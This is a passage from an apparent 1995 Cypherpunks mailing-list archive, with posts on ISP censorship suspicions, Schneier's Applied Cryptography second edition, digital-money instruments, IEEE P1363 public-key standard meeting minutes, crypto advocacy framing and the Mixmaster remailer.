information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From dat at ebt.com Fri Sep 15 10:39:33 1995 From: dat at ebt.com (David Taffs) Date: Fri, 15 Sep 95 10:39:33 PDT Subject: [revcoal@pcnet.com: Re: The owls are not what they seem] Message-ID: <9509151740.AA06675@veronica.EBT.COM> fyi... Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT) From: "Donna J. Logan" To: Marilyn159 at aol.com Cc: Search Net Subject: Re: The owls are not what they seem In-Reply-To: <950912141715_17265559 at mail06.mail.aol.com> Mime-Version: 1.0 Sender: snet-l-approval at world.std.com Precedence: bulk Reply-To: snet-l at world.std.com Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Length: 1330 It's your service provider....same thing happened to a whole bunch of us when we used to be on it...and only selective posts to selective lists. Look to the headline's your provider has generated the past few days and you'll get a clue as to what's going on...except the net spread by them and the feds is a lot wider than just kiddie pornographers. BTW, I'm being cagey in actually mentioning your service provider's name/ initials, as we found that was one of the "keywords" in the filter program used by them and a certain national police agency (who's initials also trigger the filter program) to flag posts which they thought may be "interesting", resulting in delays of up to days in posting. Same thing happened in live chat in PRIVATE chat rooms, we were able to bring the system to a complete halt by just typing the initials of Frederico's Bumbling Idiots.... The only solution to Amerigo's Obnoxious Lackeys was to cancel our accounts and switch to CHEAPER local service providers, who also happen to provide BETTER service, with no censorship/surveillance. ;-> On Tue, 12 Sep 1995 Marilyn159 at aol.com wrote: > This is so weird... > Only pieces of the message I sent are getting through. This is a little bit > more but not the whole thing. > Where is the rest of it? > Is this censorship or computer error? > From syrinx at c2.org Fri Sep 15 10:57:40 1995 From: syrinx at c2.org (Syrinx Anonymous Remailer) Date: Fri, 15 Sep 95 10:57:40 PDT Subject: No Subject Message-ID: <199509151752.KAA04838@infinity.c2.org> > Meaning: In all cases, if a page is being shown and >it links to another page, then the other page is being >shown. >I wonder if I have a pornopage. Does this mean that if I have a link to Infoseek or another search engine, that I, too, am hosting pornography? Which would be an interesting idea as far as trying to present a "safe" way to search the Internet. A web- crawler or other search mechanism of choice could be started up, and simply refuse to run searches for certain keywords. Ideally (but impractical) any pages dug up that contain the questionable words could be manually checked. From schneier at winternet.com Fri Sep 15 11:07:30 1995 From: schneier at winternet.com (Bruce Schneier) Date: Fri, 15 Sep 95 11:07:30 PDT Subject: Applied Cryptography, Second Edition: Ordering Information Message-ID: <199509151807.NAA10561@subzero> The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. This is a major rewrite: 50% more words, 7 more chapters, and over 1600 references. Not only did I make corrections to the first edition and add developments since it was published, but I also included topics left out of the first edition. (See table of contents--attached.) The second edition has lots of new algorithms (including GOST, Blowfish, RC4, and A5), more information on the Clipper Chip and key escrow, dozens of new protocols, more information on how PGP works, detailed information on key management and modes of operation, and new source code. The second edition will be published in paperback and hardcover. Right now I am making both available at a 15% discount. ***************************************************************** ORDER FORM Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00 Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00 Shipping: Air (U.S.): $5 per book Surface (U.S.): $3 per book Canada/Mexico: $7 per book Everywhere else: $9 per book Send to: Counterpane Systems, 101 E Minnehaha Parkway, Minneapolis, MN 55419 ***************************************************************** APPLIED CRYPTOGRAPHY, SECOND EDITION Table of Contents ((Sections in all capitals are either new or substantially rewritten.)) Forward by Whitfield Diffie Preface Chapter 1: Foundations Terminology; STEGANOGRAPHY; Substitution Ciphers and Transposition Ciphers; Simple XOR; One-Time Pads; Computer Algorithms; Large Numbers Part I: Cryptographic Protocols Chapter 2: Protocol Building Blocks Introduction to Protocols; Communications using Symmetric Cryptography; One-Way Functions; One-Way Hash Functions; Communications using Public-Key Cryptography; Digital Signatures; Digital Signatures with Encryption; Random and Pseudo-Random Sequence Generation Chapter 3: Basic Protocols Key Exchange; Authentication; AUTHENTICATION AND KEY EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret Splitting; Secret Sharing; Cryptographic Protection of Databases Chapter 4: Intermediate Protocols Timestamping Services; Subliminal Channel; Undeniable Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY SIGNATURES; Group Signatures; Fail-Stop Digital Signatures; Computing with Encrypted Data; Bit Commitment; Fair Coin Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing Disclosure of Secrets; KEY ESCROW Chapter 5: Advanced Protocols ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity; Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY; Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous Contract Signing; Digital Certified Mail; Simultaneous Exchange of Secrets Chapter 6: Esoteric Protocols SECURE ELECTIONS; Secure Multiparty Computation; Anonymous Message Broadcast; DIGITAL CASH Part II: Cryptographic Techniques Chapter 7: Key Length SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?; Caveat Emptor Chapter 8: Key Management Generating Keys; NONLINEAR KEYSPACES; Transferring Keys; Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys; Backup Keys; Compromised Keys; Lifetime of Keys; Destroying Keys; Public-Key Key Management Chapter 9: Algorithm Types and Modes Electronic Codebook Mode; Block Replay; Cipher Block Chaining Mode; Stream Ciphers; Self-Synchronizing Stream Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers; Output-Feedback Mode; Counter Mode; Other Block-Cipher Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers vs. Stream Ciphers Chapter 10: Using Algorithms Choosing an Algorithm; Public-Key Cryptography vs. Symmetric Cryptography; Encrypting Communications Channels; ENCRYPTING DATA FOR STORAGE; Hardware Encryption vs. Software Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING INFORMATION Part III: Cryptographic Algorithms Chapter 11: Mathematical Background Information Theory; Complexity Theory; NUMBER THEORY; FACTORING; Prime Number Generation; Discrete Logarithms in a Finite Field Chapter 12: Data Encryption Standard Background; Description of DES; Security of DES; DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY? Chapter 13: Other Block Algorithms Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK Chapter 14: Still Other Block Algorithms GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL; RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN; USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM Chapter 15: Combining Block Algorithms DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS; COMBINING MULTIPLE BLOCK ALGORITHMS Chapter 16: Pseudo-Random-Sequence Generators and Stream Ciphers Linear Congruential Generators; Linear Feedback Shift Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD; NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM M; PKZIP Chapter 17: Other Stream Ciphers and Real Random-Sequence Generators RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; Other Stream Ciphers; System-Theoretic Approach to Stream Cipher Design; Complexity-Theoretic Approach to Stream Cipher Design; Other Approaches to Stream Cipher Design; CASCADING MULTIPLE STREAM CIPHERS; CHOOSING A STREAM CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO- RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS Chapter 18: One-Way Hash Functions Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY HASH FUNCTION; MESSAGE AUTHENTICATION CODES Chapter 19: Public-Key Algorithms Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin; ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS Chapter 20: Public-Key Digital Signature Algorithms Digital Signature Algorithm (DSA); DSA VARIANTS; GOST DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other Public-Key Algorithms Chapter 21: Identification Schemes Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES Chapter 22: Key-Exchange Algorithms DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three- Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY NEGOTIATION; Conference Key Distribution and Secret Broadcasting Chapter 23: Special Algorithms for Protocols Multiple-Key Public-Key Cryptography; Secret Sharing Algorithms; Subliminal Channel; Undeniable Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All- or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind Signatures; Oblivious Transfer; Secure Multiparty Computation; Probabilistic Encryption; Quantum Cryptography Part IV: The Real World Chapter 24: Example Implementations IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III; Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS; UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T MODEL 3600 TELEPHONE SECURITY DEVICE Chapter 25: Politics NATIONAL SECURITY AGENCY; National Computer Security Center; National Institute of Standards and Technology; RSA Data Security, Inc.; PUBLIC KEY PARTNERS; International Association for Cryptologic Research; RACE Integrity Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE; ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S. EXPORT RULES; FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues AFTERWARD BY MATT BLAZE Source Code DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL; WAKE References From tcmay at got.net Fri Sep 15 11:14:05 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 11:14:05 PDT Subject: Crypto + Economics + AI = Digital Money Economies Message-ID: Dar Scott proposes some extensions to digital cash to deal with the issues being discussed here. He mentions "money orders" and "escrowed money orders," and he alludes to "trustees," or agents that would behave in certain well-defined ways. This is as good a place as any to address a point I've been thinking about for a long while, and which I've touched on before. Namely, that the "ontology" of digital money, the instruments and forms it can take, are _impoverished_ compared to the real world. In my eight years of following digital cash work, I've been struck with how little _economics_ enters the fray. Many of the protocols that seem to have problems from a purely cryptographic point of view seem to get fixed when additional _economic_ considerations are included (the consideration we cite the most is "reputation," and we debate this endlessly). The PGP "web of trust" is a kind of example of this additional consideration, if we make certain fairly reasonable assumptions about the nature of collusion. (Lots of stuff to get into here, but I want to make some other points and not get too sidetracked.) "Digital money" currently has only a few ways of dealing with transfers of value in transactions. A lot of the problems come, in my view, from this relatively spartan set of "primitives." Where are the cryptographic equivalents of: - money orders - promissary notes - receipts - warrants - lockboxes - bearer bonds - options - time deposits - coupons - escrow - IOUs - zero coupon bonds - checks ...and so on. The terms in any good dictionary of financial terms (such as the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992). (Many of these things are built up out of more basic things, with mix-ins from other classses, or with modified methods.) A look at any book on money and finance shows a rich "microworld" of "things" and "procedures" (classes and methods attached to classes). The classes have subclasses, and the methods have various behaviors and "expectations" attached (more than just simple class behavior, more of an AI or agent flavor, in my view). (AI is somewhat of a dirty word these days, due to hyped expectations. But many of the methods have been useful in limited domains. The domain of financial transactions, with the classes and methods hinted at above, involve a lot of formal manipulations and expected behaviors.) In the real world, as the "base class" of "things traded" (tangible assets) reached various limits, a new class of "money" was created, where money was gold, silver, spices, etc., that could be more easily transported and stored. And so on, through levels of abstraction (marks on clay tablets, entries in ledger books, issuances of certificates, bonds, derivatives, etc.) My point is not to recap views of the history of money in its many forms, or even to give my views on the "ontology of money," but to say that many of the problems we think are present in current digital money systems may largely result from the impoverished set of base classes of digital money. To me, an exciting project is to take the basic cryptographic protocols and build up more structured objects (blobs, envelopes, seals, etc.), and then incorporate these into even more complicated financial instruments. There have been proposals for crypto class libraries, most recently in Ray Cromwell's detailed plan for C++ crypto classes. Others I have been in communication with have expressed interest in doing the same thing in Smalltalk, given that many financial companies are doing a lot of their complicated transactions in Smalltalk. And Java has just entered the scene.... My point is not to argue for any particular language approach, or even to argue for this "ontology of digital money" as a Cypherpunks project, but to share with you some thoughts. I think significant progress will have been achieved when these "financial objects" can be launched and used without a lot of hand-tuning and human intervention. In fact, an "economic microworld" of agents/actors interacting and trading in various forms of digital cash and derivatives would be an exciting "artificial life" example, and one which would test the robustness of protocols. I don't think this is beyond the current state of the art by too much. I'm working on bits and pieces of this, but progress has been slow.... --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rsalz at osf.org Fri Sep 15 11:52:27 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 11:52:27 PDT Subject: Minutes of IEEE public-key standardization meeting Message-ID: <9509151851.AA09047@sulphur.osf.org> Date: Fri, 15 Sep 1995 11:08:56 -0800 >From: rschlafly at attmail.com (Roger Schlafly) Subject: Crypto '95 P1363 minutes To: p1363 at RSA.COM MINUTES IEEE P1363: Standard for RSA, Diffie-Hellman, and Related Public-Key Cryptography Burt Kaliski opened the meeting at 1:10 pm. The announced agenda was: IEEE P1363: Standard for RSA, Diffie-Hellman and Related Public-Key Cryptography MEETING NOTICE Thursday, August 31, 1995, 1:00-6:00pm Friday, September 1, 1995, 9:00-6:00pm University of California, Santa Barbara, CA This meeting of the P1363 working group, open to the public, will focus on the editing of a draft standard for RSA, Diffie-Hellman and other public-key cryptography. The meeting follows the CRYPTO '95 conference, held August 27-31 at the same location. AGENDA 1. Approval of Agenda 2. Approval of Minutes from May Meeting 3. Officers' Reports 4. Update on Patent Issues 5. Proposals for New Sections 6. Meeting Schedule 7. Editorial Work (schedule to be determined based on availability of draft material) 8. New Work Assignments Depending on the amount of editorial work, the meeting may end sooner than 6:00pm Friday. If you'd like to participate, contact Burt Kaliski, the working group's chair, at RSA Laboratories, 100 Marine Parkway, Redwood City, CA 94065. Phone: (415) 595-7703, FAX: (415) 595-4126, E-mail: burt at rsa.com. Draft sections and copies of previous minutes are available via anonymous ftp to ftp.rsa.com in the "pub/p1363" directory. The working group's electronic mailing list is ; to join, send e-mail to . There will be a meeting fee, though the amount has not yet been established, pending arrangements with the university. It will also be possible for participants to arrange accommodations at the university. DIRECTIONS (excerpted from the CRYPTO announcement) The campus is located approxmately two miles from the Santa Barbara airport, which is served by several airlines, including American, America West, United and US Air. All major rental car agencies are also represented in Santa Barbara, and AMTRAK has rail connections to San Francisco from the north and Los Angeles from the south. Santa Barbara is approximately 100 miles north of the Los Angeles airport, and 350 miles south of San Francisco. For more information on the CRYPTO '95 conference, contact Stafford Tavares, the general chair, at (613) 545-2945 or . In attendance, we had: Terry Arnold, Vice Chair Eric Blossom Jean-Francois Dhem *Whitfield Diffie Carl Ellison Amos Fiat Walter Fumy John Gilmore *Roger Golliver Chris Gorsuch David Grawrock Stuart Haber Aleksandar Jurisic *Burt Kaliski, Chair *John Kennedy Katherine T. Kislitzin Judy Koeller Ray Kopsa *Michael Markowitz *Alfred Menezes *Mark Oliver Paul Van Oorschot Minghua Qu *Roger Schlafly, Secretary Sherry Shannon *Jerry Solinas *Scott Vanstone Michael J. Wiener Harold M. Wilensky Roger Zuccherato Those marked with an asterisk were qualified to vote, having also attended 2 of the last 3 meetings (and thus 3 of 4, including this one). Motion 1: (Arnold, Kennedy) The agenda is approved. Passed, unanimously. Motion 2: (Arnold, Markowitz) Approve the minutes. Passed, unanimously. Kaliski reported that he is still trying to get registered OID numbers for us, but it will take the IEEE another six months to get its act together. We can proceed on the assumption that the numbers will be filled in later. Kaliski reported that the IEEE is setting up a web site to store drafts of standards online. The address is http://stdsbbs.ieee.org. When we (and IEEE) are ready, we will set up an area for our drafts. We can limit who can upload and download if we wish. Motion 3: (Oliver, Arnold) Make online documents publicly accessible to anyone. Passed, unanimously. Kaliski will set up a P1363 area on the SPA server, as soon as it is feasible. The other officers had nothing to report. Kaliski gave us a patent update. We still don't have the necessary assurances. One difficulty is the lawsuit between Cylink and RSA Data Security which may drag on for a while. There is also an arbitration proceeding between the two companies, with a ruling expected in a few weeks. The application for a waiver from the IEEE patent policy is still pending. Schlafly suggested amending the application letter to limit the waiver to the Stanford patents on the theory that the situation with the Stanford patents is more likely to be resolved in the near future. (Among other things, the Stanford patents expire much sooner than the MIT RSA patent.) When support for this position was weak, he proposed amending the application to make it clear that there is a stronger case for a waiver on the Stanford, so that if the IEEE chooses to reject our broad request, they will at least know that we could live with a narrower waiver. Others argued that a broad waiver gives our committee maximum freedom, and that we could decide later the extent to which we take advantage of the waiver. Motion 4: (Kennedy, Oliver) Leave waiver request as is. Passed, 7-3. Arnold raised the issue of the removal of a private key syntax from the elliptic curve draft. Motion 5: (Arnold, Gilmore) We introduce a representation of private keys into the standard. Passed, unanimously. Motion 6: (Arnold, Markowitz) Archiving and protecting private keys is outside our scope, and we should not include it in the body of the standard. Passed, unanimously. This motion leaves open the possibility of having advisory material on archiving private keys. This issue also provoked a discussion of syntax alternatives to ASN.1. Ellison argued that ASN.1 has a corrupting influence on the mind, and should be scrapped altogether. Kaliski said that there is no actual requirement that we use ASN.1, and that we could just use bit strings if we wished. No new sections were proposed. The next meeting was scheduled for the Crown Plaza hotel in Toronto, on Nov. 15-16, in conjunction with the Public Key Solutions (PKS) conference sponsored by Mobius. We discussed having the following meeting in conjunction with the RSA Data Security conference. That conference is at the Fairmount hotel, San Francisco, Jan. 17-19. Another possibility is in conjunction with ISOC in Feb. 22-23 at San Diego. Either way, the P1363 would probably be the two days before. We were unable to reach a consensus, so we deferred the issue to the next meeting. Markowitz assumed to role of treasurer again. The meeting fee was $60, or just $25 if only attending one day. Money for the dorms was also collected. At the request of the IEEE editors, we are moving our documents to Microsoft Word format. Our outline is now as follows. 1. Overview, scope, purpose 2. Standards references 3. Definitions 4. Elliptic curves 5. Bibliography Appendices A. Mathematical background B. Supporting algorithms C. Test vectors D. Known state of attacks E. Random numbers F. Hardware support Arnold expressed doubt as to whether the hardware support section was going to come together satisfactorily. So we changed the name of that section to "Other considerations" so that we could include other miscellaneous remarks. Ellison took over the random number section. He wanted to ditch some of the randomness tests as not being strong enough, and include some other explanatory material. At 3:00 we took a break until 3:35. The rest of the meeting was devoted to a detailed discussion of the elliptic curve draft. Menezes handed out a new copy. Solinas handed out a paper on elliptic curve point counting, to be included in appendix B. It gives a nice way of choosing a curve with a predictable number of points. To make it more complete, he will add a couple of references, particularly to the forthcoming CRC handbook of applied cryptography, by Menezes, Van Oorschot, and Vanstone. Vanstone suggested switching the elliptic curve spec to multiplicative notation. Mathematicians prefer to use an additive notation because the curve is an abelian group. However, it is very confusing for cryptographers because the formulas are analogous to Diffie-Hellman and Elgamal protocols where the principal operation is multiplication in Zp. Motion 7: (Kennedy, Menezes) Stay with additive notation for elliptic curves, for consistency with the mathematical literature. Passed, unanimously. For various reasons, we decided that n, the order of the elliptic curve base point, should be required to be prime. Someone also thought "G" was better notation for the base point. Kaliski questioned the block splitting scheme in the ECES. Kennedy said it scored high on the hokey meter. At 9:10 Friday morning, the meeting resumed. The treasurer reported collecting $1662.70. This included $538.85 for dorm rooms and $1125 in IEEE fees. Kaliski demonstrated a cryptanalytic attack on these totals, as a way of verifying them. Vanstone gave an explanation of ECES. One rationale for the block splitting scheme is that a typical elliptic curve uses 160 bits for each of x and y. A triple DES key is 168 bits. A straightforward scheme would only use x, and thus not be able to encrypt the whole triple DES key. Using y would give 320 bits, but y is (nearly) a function of x, so there are some cryptographic subtleties in using y directly. In the end, we weren't that comfortable with it, so we decided to stick with a simpler one-block scheme. The simpler scheme just multiplies (or perhaps xors) the message by x. We took a break at 10:45. There was more criticism of ASN.1. Ellison offered to construct some simple data representations which would allow us to avoid ASN.1. Kaliski suggested that an elliptic curve point (x,y) with possible compressed y could be represented by [ x bytes ] 00 [ x bytes ] 01 [ x bytes ] 80 [ y bytes] That is, the last line is for the full x and y. If y is compressed down to one bit, the first or second line is used. Kaliski argued against the signature schemes directly referencing a hashing operation. Someone may want to sign something other than a hash value. An implementation may want to conform without having a hash function built-in. Solinas objected that there are risks to signing data other than hash values. This issue was not resolved. Solinas complained that there are various parameters buried in the draft without any indication as to how these are related to overall security. He volunteered to write some notes on how the various parameters were related to each other. How these are incorporated is to be determined. Someone pointed out we should check r = 0 or s = 0 in the signature schemes. At 12:20 we took a break for lunch, until 1:45. Vanstone gave a talk and handout on key agreement protocols. He showed how he and Menezes found weaknesses in other Diffie-Hellman type protocols, and they proposed a new one that overcomes the problems. We all liked it. We thought q and n should be part of the system parameter setup. There was some discussion of optimal normal bases versus using an irreducible polynomial. We also discussed advantages of restricting to p = 3 mod 4, and to curves with a = -3. At 3:20 we took a break until 3:30. Ellison handed out some introductory material on random numbers that he wrote since taking over the job the day before. The plan now is to have a draft standard at the next (Nov.) meeting, and then to polish it up for ballot at the following meeting. We adjourned at 4:20. From rishab at dxm.org Fri Sep 15 11:58:47 1995 From: rishab at dxm.org (Rishab Aiyer Ghosh) Date: Fri, 15 Sep 95 11:58:47 PDT Subject: "Use implies consent to monitoring" Message-ID: <199509151853.LAA10932@infinity.c2.org> In the InterNIC notice on fees for domain names that marks the end of an era, (http://rs.internic.net/announcements/fee-policy.html) I noticed this gem of a postscript: Please be advised that use constitutes consent to monitoring (Elec Comm Priv Act, 18 USC 2701-2711). ---------------------------------------------------------------------- The Indian Techonomist - newsletter on India's information industry http://dxm.org/techonomist/ rishab at dxm.org Editor and publisher: Rishab Aiyer Ghosh rishab at arbornet.org Vox +91 11 6853410; 3760335; H 34 C Saket, New Delhi 110017, INDIA From trei at process.com Fri Sep 15 12:15:22 1995 From: trei at process.com (Peter Trei) Date: Fri, 15 Sep 95 12:15:22 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <9509151915.AA16093@toad.com> -----BEGIN PGP SIGNED MESSAGE----- Tim writes: >Indeed, some people here have been calling themselves by various names >("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise >the terms "geek," "dweeb," and "nerd," and think anyone who calls themselves >by these insults is not "reclaiming and deconstructing the labels of the >oppressor class," as the slogan goes, but is merely insulting themselves. >Blacks who call themselves "niggers," homosexuals who call themselves >"queers," and computer programmers who call themselves "geeks" and "dorks" >are all playing the same game. I fail to see how you can write this, and then claim it's OK to call yourself a 'punk'. >A better approach is for the "conservatives" who want a "more conservative" >name to simply do what I suggested: form a new group and name it what they >like. They wouldn't have to quit this list, they would just be able to >cleanly recruit for their new list. >Seems simple to me. And honest. And less devisive than trying to change the >name of a group with a long history (by modern standards) and with several >well-known achievements. Who is trying to be dishonest, and what are they trying to be dishonest about? I'm really confused by this. Tim, I don't want to take your toy away, or minimize the acheivements of the cypherpunks (among whom I somewhat presumptively include myself). OK. Let's NOT drop the term 'cypherpunk'. However, I do think we need to have available another term for 'people with our interests' if we're going to have maximal effectiveness. What follows is my original followup, written last night. - --------------------------------------------------------------- I've gotten a number of responses to my post 'Cypherpunk considered harmful." It's pretty clear that a lot of people did not really understand what I was getting at. This is my fault. I'll try to clarify. What is the situation on the ground, here in mid September 1995? It's utterly clear that the US and other governments, are dead set against the widespread use of strong, unencumbered crypto. 'They' are using many different (and weak) pretexts to delay or prevent it's incorporation into commercial software. If there is a hidden state agenda, 'our' belief is it is that the state wishes to retain it's current ability to spy unseen on the citizenry, wiretapping with or without warrents, and examine stored information without the cooperation of the owner. The general 'cypherpunk viewpoint', if I may generalize, is diametrically opposite: It's not really a hidden agenda, since frequent rants make it pretty clear. Since we're not a unified command and control system like the state, different cypherpunks have different goals, but I hazard that most would agree with: 'Strong, uencumbered cryptography is an empowerment tool for the electronic age; it strengthens the individual in relation to the state, allowing him (or her) to communicate privately, and store his data as securely as if it resided in his own head. The widespread use of strong cryptography will lead to social changes that we regard as desirable.' If you accept this arguably paranoid vision of our situation, then it's clear that we are in a battle for the hearts and minds of the people: The State wants to convince people that their safety and prosperity lies in trusting Big Brother to watch over and take care of them, and nothing but danger lies outside of BB's line of sight. The cypherpunks take a much more libertarian viewpoint; that the state is already too strong and intrusive, and that cryptography will not only allow us to engage in commerce and protect ourselves against crime, it will also allow us to act outside of improper state control. But time is running out. All the state has to do is convince people that strong unescrowed encryption is needed only by criminals - if you trust the state, there is no reason to object to it being able to listen in - after all, all laws are reasonable, and the state won't listen in without a warrant. 'We' have a harder task. We need to convince people that they need encryption - it will protect us against criminals, snoops, and hackers, and the state's proposals will not do this. It's a much more subtle thesis, without the easy emotional hooks that can be exploited by the state to promote it's position. I don't think we can turn people into libertarians, and then get them to adopt cryptography to protect themselves from the statists. At least, not enough people to count in the short term, and the short term is where we need to focus at the moment. I *do* think we can persuade people that they need cryptography to protect themselves against criminals, and that the governments proposed standards for key length limits and key escrow will make the crypto so weak and insecure that it will cause more crime than it will prevent. That's a critical point - that the individual can, without difficulty, use cryptography to protect him or herself against criminals more effectively than he could by relying on the state. The memes we want to propagate are 1. "I need strong unescrowed cryptography to protect myself against criminals." If we can convince a large portion of the population of this (and we have truth on our side), we'll be well on our way. 2. "The government's initiatives on encryption, while they may be well-intentioned, are worse than useless, and will endanger me and my loved ones." If we can get this through the public's collective head as well, we'll have won the battle. This goal is where the 'cypherpunk considered harmful' title comes from. I want to propagate these ideas. If I go up to an average person and tell them "The State is working to ensure that it can spy on your every communication, and can't be trusted to follow it's own rules for doing so. Use cryptography to help promote cryptoanarchy!", he will usually dismiss me as a nutcase. If I say "Criminals and hackers can tap your internet communications, defraud your cell phone account, eavesdrop on your calls, impersonate you, steal your credit card numbers, and spy on your business secrets. I can tell you how you can easily prevent this", then he is interested, and wants to know more. Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as nutcases for many people, and are a barrier to getting our ideas across. I'm not saying this pigeonholing is correct - in fact I despise people who judge a book by it's cover, but so many people DO make such snap judgements that we need to take this into account when talking to the general public. For those who have responded, *I* do not have a problem with the term cypherpunk. However, I know that there are many people who do, people we want on our side. I propose that in communicating with the cryptographic laity, we should be emphasizing the anti-crime aspects of crypto, as well as it's enabling impact on commerce and the American software industry. We'll get a lot more converts with this approach than we would by emphasizing the political aspects of cypherpunk, no matter how important we think they are. Think about it. Which future would you rather see: 1. Lots of people demanding strong unescrowed crypto for what you consider rather peripheral and politically unaware reasons, which you have educated them in. 2. Unescrowed crypto banned, with those who promote considered aiders and abeters of the four horsemen, (but boy are they ideologically pure!). Peter Trei I probably won't see any responses till Monday. I'm going for a weekend at a resort on Lake Winnipesaukee. If you need me, I'll be in the hot tub. :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3 zsyK3fej+IQ= =YqDH -----END PGP SIGNATURE----- Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From loki at obscura.com Fri Sep 15 12:37:02 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 15 Sep 95 12:37:02 PDT Subject: Mixmaster status Message-ID: At 5:58 AM 9/15/95, Russell Nelson wrote: > While I have not discussed it, I can not imagine that there would not also > be a free version of the server code (with source). Without remailers what > is the point of the client software? > >I'm confused here. Isn't every copy of mixmaster potentially a client >and/or server? That seems to me to be one of the beautiful aspects of >mixmaster -- run a remailer and you greatly increase your own privacy. > > I would like to see that continue, although I think that the Windows and Mac versions are likely to be client only. Since I am putting my reputation behind those statements, I don't want to box myself in. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From Chris.Claborne at 